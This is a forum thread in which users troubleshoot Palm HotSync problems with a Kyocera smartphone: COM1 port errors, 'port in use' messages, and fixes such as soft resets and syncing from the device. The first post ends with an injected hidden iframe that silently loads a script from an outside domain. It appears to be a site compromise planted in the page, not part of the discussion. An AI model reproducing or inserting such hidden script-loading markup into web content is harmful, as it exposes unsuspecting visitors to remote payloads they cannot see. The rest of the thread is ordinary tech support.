+ Reply to Thread

Problems using True USB cable for hotsync

Hi all.. I'm having problems hotsyncing with the true usb cable. The hotsync manager doesn't recognize anything is connected to the computer. When I try to do the setup in the hotsync manager, it doesn't list any Coms, and comes up with an error of "The selected port, COM1, is not available at this time. HotSync manager will open the port when it becomes available."

Any ideas?

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Port is in use

I am also having a hotsync problem.

I can hotsync without problem if I use the HotSync screen in palm mode. However, when I use the button on the base, I get an error that says ... "This feature is not available when the port is in use."

Anyone have any suggestions.

Thanks

This feature is not available when the port is in use

Thanks for the work-around, Alti, because I've been battling this all day. I even unistalled, reinstalled, but didn't think to try a HS from the palm itself. Well, I wasn't going to go through this hassle each time I want to HS and was getting quite frustrated. I'm using a direct com port connection and it works just fine sometimes and then other times I get the error message of "This feature is not available when the port is in use."

I did learn do NOT bother calling Palm, as they're not supporting the Smartphone without a $25.00 charge. Oh, thanks! So, now I've been on hold with Kyocera for 15 mins. If I find the fix I'll post it here.
    Terri Romine
    www.innovativeoffice.net

I found on another thread a suggest to try a soft reset and a pc reboot. I did a soft reset and that fixed it for me (with a pc reboot).

I had searched the board but missed the other thread initially.

How to find program using com1?

As soon as I boot my computer I get the message, "The selected port, com1, is not available at this time. Hot Sync manager will open this port when it becomes available." When I HS, there is response but the HS is incomplete (eg my address book does not update) so I do not think it is a cable problem. I think there is another program interfering with com1 but I do not know how to figure out which program it is. Can anyone give me any suggestions. Thanks, Ace.

There could be any number pf programs that may use a com port. If you are running a WIndows based PC, check the system tray for what programs are running. Try to determine which is using the com port. For example, I have a universal remove that uses a com port. Maybe a modem that is ready to receive a fax? Hard to determine too much without looking at it (for me anyway
    My sordid past:

Kyocera 6035, Kyocera 7135, Samsung i700, iPAQ 6315, iPAQ hx4705, Motorola a630, BB 7100t, iPAQ rx3115, JAM 850, BB 8700g, Samsung i320 (just for fun), imate KJAM, TMO SDA, MDA, TMO Wing

back
    Will the phone hotsync in the cradle with the USB cable plugged in (seriasl not connected)?
    Palm M515>Kyocera 6035>Kyo 7135>Treo 650>Treo700W>Treo 700P>Palm Centro Verizon